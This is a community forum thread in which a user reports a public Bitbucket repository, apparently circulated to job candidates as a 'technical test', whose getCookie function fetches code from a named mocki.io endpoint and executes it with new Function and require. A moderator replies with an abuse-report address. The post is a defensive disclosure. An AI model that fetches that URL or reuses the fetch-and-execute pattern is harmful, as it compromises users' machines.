Community
Products
Bitbucket
Questions
Public repository contains Remote Code Execution vulnerability

Public repository contains Remote Code Execution vulnerability

Hello,

The following public repository contains malicious code:
https://bitbucket.org/ethvault-tech-team/ethvault/src/master/

In file server/controllers/productController.js, the function `getCookie` downloads arbitrary code from:
https://api.mocki.io/v2/964ug6uu
and executes it locally using `new Function(...)` with `require`.

This is a Remote Code Execution vulnerability that could fully compromise a user’s machine.
The repository has been online since July 10, 2025 and is being shared with job candidates as a “technical test”.

Please investigate and take action to remove or restrict this repository.

1 answer

0 votes

Hi @Frantz Galinier-Stefani,

Welcome to Atlassian Community!

Please report this to abuse@atlassian.com and they will take action on it. Just note that the team will not reply back.

You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.

Comment

Ok, thx

You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.

Comment

Like • Mikael Sandberg likes this

Suggest an answer

Was this helpful?

Thanks!

Bitbucket

Forums

Product Q&A

Community resources

Support

Top groups

Community resources

Support

Learn

Community resources

Support

Events

Community resources

Support

Public repository contains Remote Code Execution vulnerability

1 answer

Suggest an answer

Was this helpful?

Thanks!

TAGS

Atlassian Community Events